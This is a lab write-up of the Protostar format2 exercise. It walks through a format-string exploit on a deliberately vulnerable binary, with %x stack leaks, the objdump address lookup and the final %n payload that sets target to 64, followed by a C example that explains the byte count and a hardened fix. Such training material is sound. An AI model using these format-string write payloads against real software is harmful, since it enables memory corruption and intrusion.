Protostar format2

2023-04-21 (Friday)


About

This level moves on from format1 and shows how specific values can be written in memory.

This level is at /opt/protostar/bin/format2.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
    char buffer[512];

    fgets(buffer, sizeof(buffer), stdin);
    /* Deliberately vulnerable: user input is used as the format string. */
    printf(buffer);

    if(target == 64) {
        printf("you have modified the target :)\n");
    } else {
        printf("target is %d :(\n", target);
    }
}

int main(int argc, char **argv)
{
    vuln();
}
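This level differs from the previous one in two ways: 1. the input is now read with fgets; 2. target must equal 64.

As before, we need to find the location of target:

user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g         O .bss     00000004                            target

As before, first find the position where the write will take place:

user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa"+"%x."*150' | ./format2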
aaaaaaaa200.b7fd8420.bffff624.61616161.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4.80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626.
target is 0 :(

Nice, this time it is very close. Confirm the position as before:

user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa%x%x%x%x"' | ./format2
aaaaaaaa200b7fd8420bffff62461616161
target is 0 :(

Follow the previous level's approach and see what happens:

user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%x%x%x%n"' | ./format2
aaaa200b7fd8420bffff624
target is 27 :(

OK, the value of target has now been changed successfully. The level requires 64, so we only need to make one %x print with a fixed width:

user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%40x%x%x%n"' | ./format2
aaaa                                                                         200b7fd8420bffff624
you have modified the target :)
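
Where the 27 and the 64 come from, and how vuln() should echo its input, as an added example that is not part of the original post or of the Protostar source. It replays the same conversions through a literal format string with a real int pointer for %n; the names bytes_before_n, echo_safely and LEAKED are hypothetical, and "AAAA" is a constructed stand-in for the 4-byte address prefix.

```c
#include <stdio.h>
#include <string.h>

/* The three stack words the page's %x output shows before the buffer. */
static const unsigned int LEAKED[3] = { 0x200, 0xb7fd8420, 0xbffff624 };

/* Replay the page's conversions with a literal format string and a real
 * int* for %n, so the count is observed without any memory corruption.
 * "AAAA" stands in for the 4-byte address prefix (constructed value).
 * width is the minimum field width of the first %x; 0 means none. */
int bytes_before_n(int width)
{
    char out[256];
    int count = -1;

    snprintf(out, sizeof out, "AAAAaaaa%*x%x%x%n",
             width, LEAKED[0], LEAKED[1], LEAKED[2], &count);
    return count;
}

/* Hardened echo for vuln(): the input is passed as data to a constant
 * format, so %x and %n inside it are printed, not interpreted. */
int echo_safely(char *out, size_t n, const char *input)
{
    return snprintf(out, n, "%s", input);
}

int main(void)
{
    char out[64];

    printf("no width : %d\n", bytes_before_n(0));   /* 27 */
    printf("width 40 : %d\n", bytes_before_n(40));  /* 64 */

    echo_safely(out, sizeof out, "aaaa%40x%x%x%n");
    printf("echoed   : %s\n", out);
    return 0;
}
```

%n stores the number of bytes printed so far: 4 + 4 + 3 + 8 + 8 = 27 without a width, and 4 + 4 + 40 + 8 + 8 = 64 once the first %x is padded to 40 characters. Replacing printf(buffer) with a constant format (or fputs) and building with -Wformat -Wformat-security removes the write primitive.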